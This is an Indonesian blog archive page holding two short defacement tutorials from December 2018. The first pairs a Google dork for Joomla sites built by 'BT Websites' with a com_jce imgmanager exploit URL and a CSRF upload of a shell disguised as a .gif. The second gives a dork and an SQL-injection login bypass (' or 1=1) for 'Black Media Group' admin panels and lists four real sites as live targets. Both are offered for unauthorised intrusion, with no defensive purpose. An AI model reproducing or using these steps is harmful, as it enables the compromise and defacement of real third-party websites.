Postingan

Menampilkan postingan dari Desember, 2018

Joomla BT Websites vulnerability com_jce with csrf

-
Gambar
Joomla BT Websites vulnerability com_jce with csrf Dork   : intext:"Built By BT Websites" Exploit :  index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 Csrf :  pastebin Dorking dlu, anggap ae dah dapet target Buat yg gamau ribet langsung make bot ae Tambah exploit Contoh site,com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 Vuln?  {"result":null,"error":"No function call specified!"} Masukin target ke csrf  Upload file gif/jpg/png cek file di site,com/shell.gif Ok gitu doang
Posting Komentar
Baca selengkapnya

Deface metode Bypass SQL login New Dork

-
Gambar
Ok kali ini saya akan share Bypass SQL Login bahan" yang kita butuhkan adalah - hp / pc - internet (penting) - dork intext:"by Black Media Group" intext:"Developed by Black Media Group" ( Kembangin biar dpt yg belum pernah ke touch ) Ok pertama dorking dulu Bila udh dpt web nya,misal http://www.target.com/?route=client Hapus "?route=client" tambahin /admin Jadi http://www.target.com/admin Jika udah tambahin user dan pass nya user : ' or 1=1 limit 1 -- -+ pass : ' or 1=1 limit 1 -- -+ Taraaaa terserah mau lu apain deh web nya :D Livetarget :  http://www.pordahavas.com/admin/ http://catalo.bmgdemo.com/admin / http://www.apexace.com/admin/ http://horizonplazahk.com/admin/ Kalau Live Target udh di pacth admin jngn sampai salahin saya ya  Ok sekian dulu dari saya bye bye :v
Posting Komentar
Baca selengkapnya